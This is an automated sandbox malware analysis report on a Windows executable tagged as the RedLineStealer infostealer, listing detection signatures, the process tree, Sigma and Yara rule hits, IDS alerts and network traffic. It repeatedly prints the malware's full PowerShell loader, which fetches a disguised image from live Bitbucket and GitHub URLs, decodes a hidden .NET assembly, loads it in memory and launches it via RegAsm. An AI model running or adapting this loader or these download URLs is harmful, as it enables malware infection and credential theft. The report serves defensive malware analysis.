Windows Analysis Report
OTO2wVGgkl.exe

Overview

General Information

Sample name: OTO2wVGgkl.exe (renamed because the original name is a hash value)
Original sample name: 63af3844e6d0a5fa89da17713ce1fb59.exe
Analysis ID: 1527751
MD5: 63af3844e6d0a5fa89da17713ce1fb59
SHA1: 8b457819c6b7ce8e04755ef75b8ce176bc58fb28
SHA256: 7507af39b3ed38d361e06c2a232d5703369bb11706184d0d10318a5ff3d9cabc
Tags: exe, RedLineStealer, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • OTO2wVGgkl.exe (PID: 280 cmdline: "C:\Users\user\Desktop\OTO2wVGgkl.exe" MD5: 63AF3844E6D0A5FA89DA17713CE1FB59)
    • cmd.exe (PID: 2064 cmdline: cmd.exe /c 123.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 972 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 1776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated base64 blob omitted]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 4788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 1012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 1776 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
    Process Memory Space: powershell.exe PID: 1776 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings below)
    • 0x5ebf:$b2: ::FromBase64String(
    • 0x389f2:$b2: ::FromBase64String(
    • 0x5cd0:$b3: ::UTF8.GetString(
    • 0x38803:$b3: ::UTF8.GetString(
    • 0x1a3ce:$s1: -join
    • 0x1f417:$s1: -join
    • 0x703cd:$s3: reverse
    • 0x77022:$s3: reverse
    • 0x79009:$s3: reverse
    • 0x84038:$s3: reverse
    • 0xe5afd:$s3: reverse
    • 0xe5deb:$s3: reverse
    • 0xe6505:$s3: reverse
    • 0xe6cbe:$s3: reverse
    • 0xedda9:$s3: reverse
    • 0xee1c3:$s3: reverse
    • 0xeed4b:$s3: reverse
    • 0xef9f8:$s3: reverse
    • 0x11bbdb:$s3: reverse
    • 0x127419:$s3: reverse
    • 0x13c0c6:$s3: reverse
    Process Memory Space: powershell.exe PID: 5664 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
      Process Memory Space: powershell.exe PID: 5664 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings below)
      • 0xc616:$b2: ::FromBase64String(
      • 0x2b275:$b2: ::FromBase64String(
      • 0x39cb2:$b2: ::FromBase64String(
      • 0x2d718b:$b2: ::FromBase64String(
      • 0x32c26e:$b2: ::FromBase64String(
      • 0x42bd04:$b2: ::FromBase64String(
      • 0x42dbde:$b2: ::FromBase64String(
      • 0xc427:$b3: ::UTF8.GetString(
      • 0x2b086:$b3: ::UTF8.GetString(
      • 0x39ac3:$b3: ::UTF8.GetString(
      • 0x2d6f9c:$b3: ::UTF8.GetString(
      • 0x32c07f:$b3: ::UTF8.GetString(
      • 0x42bb15:$b3: ::UTF8.GetString(
      • 0x42d9ef:$b3: ::UTF8.GetString(
      • 0x133b0f:$s1: -join
      • 0x140be4:$s1: -join
      • 0x143fb6:$s1: -join
      • 0x144668:$s1: -join
      • 0x146159:$s1: -join
      • 0x14835f:$s1: -join
      • 0x148b86:$s1: -join
      Source | Rule | Description | Author | Strings
      amsi64_5664.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

        Spreading

        Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t

        System Summary

        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated base64 blob omitted]
        Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t
        Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated base64 blob omitted]
        Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", ProcessId: 972, ProcessName: wscript.exe
        Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", ProcessId: 972, ProcessName: wscript.exe
        Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", ProcessId: 972, ProcessName: wscript.exe
        Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OTO2wVGgkl.exe, ProcessId: 280, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t
        Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 123.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs", ProcessId: 972, ProcessName: wscript.exe
        Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated base64 blob omitted]
        Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1012, ProcessName: svchost.exe

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = 
@('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $t
        Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP  Destination Port  Protocol
        2024-10-07T09:33:18.848191+0200  2049038  1         A Network Trojan was detected  185.199.111.133  443          192.168.2.6     49725             TCP


        AV Detection

        Source: OTO2wVGgkl.exe | Virustotal: Detection: 21%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA
        Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49725 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49752 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 16.182.70.97:443 -> 192.168.2.6:49760 version: TLS 1.2
        Source: OTO2wVGgkl.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: OTO2wVGgkl.exe
        Source: Binary string: wextract.pdbGCTL source: OTO2wVGgkl.exe
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe | Code function: 0_2_00007FF6975A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

        Networking

        Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.111.133:443 -> 192.168.2.6:49725
        Source: global traffic | HTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /rulmerurk/ertertqw/downloads/po06.txt HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu0QDWzRjYpiFcJf1LqlV%2BkrHMKyohVoC%2FlxeRSvJASoF%2Bt2WTzyQjSIHALhmB2AQEunqbDGWETcZMPjKV6%2B8FCeDi3stulqp5tDCBCbWevSBH5q1izI0RCdA49Bw%3D%3D&Expires=1728287751 HTTP/1.1 | Host: bbuseruploads.s3.amazonaws.com | Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 185.166.143.48
        Source: Joe Sandbox View | IP Address: 185.199.111.133
        Source: Joe Sandbox View | ASN Name: AMAZON-02US
        Source: Joe Sandbox View | ASN Name: FASTLYUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
        Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
        Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: svchost.exe, 0000000A.00000002.3436851309.0000025084884000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
        Source: qmgr.db.10.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
